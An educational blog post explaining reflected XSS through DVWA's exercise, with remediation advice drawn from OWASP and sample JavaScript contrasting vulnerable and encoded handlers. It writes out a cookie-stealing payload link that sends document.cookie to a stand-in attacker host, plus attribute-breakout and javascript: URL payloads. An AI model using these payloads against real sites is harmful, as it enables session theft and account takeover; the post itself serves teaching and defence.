Why a user-controlled pop-up is vulnerable?
Have you ever wondered why a simple pop-up^, one that a user can control, makes an application vulnerable? What is the real fuss about a mere pop-up? Indeed, it's just a pop-up; what harm can it do? We all run into plenty of pop-ups while browsing a website, so what difference does it make if you are the one controlling it, right? What exactly is the logic behind this scenario?
The above image shows a simple pop-up saying "test", created while testing DVWA. Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is, well, damn vulnerable: it lets security professionals test their skills and tools in a legal environment, helps web developers understand how to secure web applications, and gives teachers and students a classroom setting for learning web application security. This pop-up came from the "XSS (Reflected)" exercise in DVWA. You can explore DVWA for other web vulnerabilities by installing it from the GitHub repository digininja/DVWA.
In this article, we’ll be discussing the real, nitty-gritty behind the question: Why a user-controlled pop-up is vulnerable?
The code looked something like: <script>alert("test")</script>
Conclusion: the browser is an idiot. It cannot tell which parts of the page the developer wrote and which parts were copied in from the URL; all it sees is a page served by your domain. If that page contains a <script>, then you, the master, are ordering it to run that script, and it will. ✔
So, as said, the website is vulnerable to XSS, more precisely Reflected XSS, also known as First Order XSS (or, say, a user-controlled pop-up; okay, I give up, no more nomenclature now). Instead of a harmless alert, the attacker can craft a malicious link like*:
Evil Code: https://yourweb.com/somepage.ex?vulnerableparameter=<script>var+x=new+Image;+x.src="https://attackerweb.com/"%2bdocument.cookie;</script>
Did you notice what I just did there? Let me explain; the actions taken are:
- a silent request to the attacker's server, https://attackerweb.com/ (the script "loads an image" from there, so the page does not visibly change and the victim notices nothing)
- theft of the cookie set by your website, appended to that request as part of the URL
- and lastly, grief for your poor soul: your session is mine.
Code decoded (the + signs in the query string are spaces and %2b is a literal +): var x = new Image; x.src = "https://attackerweb.com/" + document.cookie;
You can follow the decoded part, right? The stolen cookie carries your session identifier, so the attacker can replay it from their own browser, be treated as you, and get full access to your account on the website. (One caveat worth knowing: a cookie flagged HttpOnly cannot be read through document.cookie, which is exactly why that flag exists; the injected script can still make requests as you from inside the page, though, so HttpOnly limits the damage rather than fixing the bug.)
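To make the decoding and the reflection concrete, here is an added example; it is not DVWA's source and not code from this article. It takes the Evil Code link above, shows what the server-side code actually receives after the query string is decoded, and puts a vulnerable handler that reflects the value as-is next to one that HTML-encodes it. The names somepage.ex and vulnerableparameter are the article's placeholders, and the "Hello ..." page template is assumed.

```javascript
// Added example, not DVWA's source and not the article's own code: a stand-in
// for the reflected-XSS endpoint. "somepage.ex" and "vulnerableparameter" are
// the article's placeholders; the "Hello ..." template below is assumed.

// The attacker's link from the article, embedded here as a constructed sample.
const EVIL_URL =
  'https://yourweb.com/somepage.ex?vulnerableparameter=' +
  '<script>var+x=new+Image;+x.src="https://attackerweb.com/"%2bdocument.cookie;</script>';

// Step 1: what the server-side code actually receives. Query strings are
// form-decoded: '+' becomes a space and '%2b' becomes a literal '+', which is
// why the attacker wrote the JavaScript that way.
function extractParam(urlString, name) {
  return new URL(urlString).searchParams.get(name);
}

// Step 2 (vulnerable): reflect the parameter straight into the response body,
// the behaviour the article describes for DVWA's reflected-XSS page.
function renderVulnerable(value) {
  return `<html><body><pre>Hello ${value}</pre></body></html>`;
}

// Step 2 (fixed): HTML-encode before inserting untrusted data into element
// content, which is the OWASP rule for this context.
function htmlEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderSafe(value) {
  return `<html><body><pre>Hello ${htmlEncode(value)}</pre></body></html>`;
}

// A crude stand-in for the browser's HTML parser: is there a <script> element
// in the markup the browser is about to execute?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Stand-alone run: print what the server sees and what each handler sends back.
const payload = extractParam(EVIL_URL, 'vulnerableparameter');
console.log('decoded parameter:', payload);
console.log('vulnerable page executes script:', containsScriptTag(renderVulnerable(payload)));
console.log('encoded page executes script:   ', containsScriptTag(renderSafe(payload)));
```

The decoded value printed by the first line is the same JavaScript as in "Code decoded" above; in the encoded page it survives only as text inside the <pre>, so the browser displays it instead of running it.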
- Note: action required: a logged-in victim (here, you) has to be tricked into clicking the malicious link, which is no great hurdle, since people (I trust no one) happily click unknown URLs. Moreover, the link looks legit because it points at the trusted website (https://yourweb.com/), and URL shorteners like Bit.ly can hide the ugly part of it entirely.
^What actually is a pop-up?
So, now, the Remediation:
What can you do?
- Firstly, do not fall for social engineering gimmicks. Do not click unknown URLs/images/kitty faces/yes, all the other unknowns (I repeat, do not; or, what, just leave it, go ahead, I'm no one to speak for you, it's all yours).
- If you really have to check your account, go to the original website yourself, authenticate and make the required changes. Yeah, you heard me. Always validate; look where you are going. In case of code red, close the tab, abort the task (and pray it was in time).
- On a serious note, to prevent XSS in your website, follow the rules below:
- Never Insert Untrusted Data Except in Allowed Locations
- HTML Encode Before Inserting Untrusted Data into HTML Element Content
- Attribute Encode Before Inserting Untrusted Data into HTML Common Attributes
- CSS Encode And Strictly Validate Before Inserting Untrusted Data into HTML Style Property Values
- URL Encode Before Inserting Untrusted Data into HTML URL Parameter Values
- Sanitize HTML Markup with a Library Designed for the Job
- Properly use modern JS frameworks
- Implement a Content-Security-Policy header (the old X-XSS-Protection header is deprecated and ignored by current browsers; OWASP now recommends CSP instead)
For more info, don't forget to refer to the OWASP XSS Prevention Cheat Sheet.
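The rules above differ by output context, and an encoder that is right for one context is wrong for another. The following added example (not the article's, OWASP's or DVWA's code) applies the attribute-encoding and URL-encoding rules with an unencoded "before" beside each fixed version, and goes one step beyond the listed rules to show the case where encoding alone is not enough: an untrusted value used as a whole URL, where a javascript: scheme survives encoding intact and must be rejected by validation. The page fragments, the attacker inputs and the base URL https://yourweb.com/ are constructed for illustration.

```javascript
// Added example, not from the article, OWASP or DVWA: the encoding rules
// applied per context, with the unencoded "before" beside each fixed version.
// The page fragments and the attacker inputs are constructed for illustration.

// Constructed attacker inputs, one per output context.
const ATTR_PAYLOAD = '" onmouseover="alert(document.cookie)'; // closes a quoted attribute
const URL_PAYLOAD = 'javascript:alert(document.cookie)';      // a whole URL the victim clicks
const QUERY_PAYLOAD = '<script>alert(1)</script>';            // a value going into ?q=

// Rule: attribute-encode before inserting untrusted data into HTML attributes.
// OWASP's attribute encoding turns every non-alphanumeric ASCII character into
// &#xHH; so nothing can close the quote or start a new attribute.
function attrEncode(s) {
  return String(s).replace(/[^A-Za-z0-9]/g,
    (c) => `&#x${c.charCodeAt(0).toString(16).padStart(2, '0')};`);
}

function inputVulnerable(value) {
  return `<input type="text" name="q" value="${value}">`;
}
function inputSafe(value) {
  return `<input type="text" name="q" value="${attrEncode(value)}">`;
}

// Rule: URL-encode before inserting untrusted data into a URL parameter value.
// encodeURIComponent leaves no '"', '<', '>' or '&' behind, so the result also
// cannot escape the quoted href attribute it lands in.
function searchLinkVulnerable(q) {
  return `<a href="/search?q=${q}">search</a>`;
}
function searchLinkSafe(q) {
  return `<a href="/search?q=${encodeURIComponent(q)}">search</a>`;
}

// Beyond the listed rules: when the untrusted value is the *whole* URL,
// encoding is not enough. "javascript:alert(1)" survives encoding untouched
// and still runs on click, so validate the scheme and reject anything else.
function safeHref(untrustedUrl) {
  let parsed;
  try {
    parsed = new URL(untrustedUrl, 'https://yourweb.com/'); // base URL assumed
  } catch (e) {
    return '#'; // unparsable input gets a harmless placeholder
  }
  if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') return '#';
  return attrEncode(parsed.href); // allowed scheme: still attribute-encode it
}
function profileLink(untrustedUrl) {
  return `<a href="${safeHref(untrustedUrl)}">profile</a>`;
}

// Stand-alone run: the vulnerable and fixed markup for each payload.
console.log(inputVulnerable(ATTR_PAYLOAD));
console.log(inputSafe(ATTR_PAYLOAD));
console.log(searchLinkVulnerable(QUERY_PAYLOAD));
console.log(searchLinkSafe(QUERY_PAYLOAD));
console.log(profileLink(URL_PAYLOAD));
```

In the vulnerable input field the payload ends the value attribute and adds its own onmouseover handler; in the encoded version the quote becomes &#x22; and stays inside the value. The search link shows the same idea for a query parameter, and profileLink shows that a javascript: URL has to be rejected outright, since no amount of encoding turns it into something safe to click.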
I know what you are thinking, an unknown link at the end of the post. No, I’m not doing any gimmicks on you. You can trust me (or not, evil laughs). Did you get that? 👾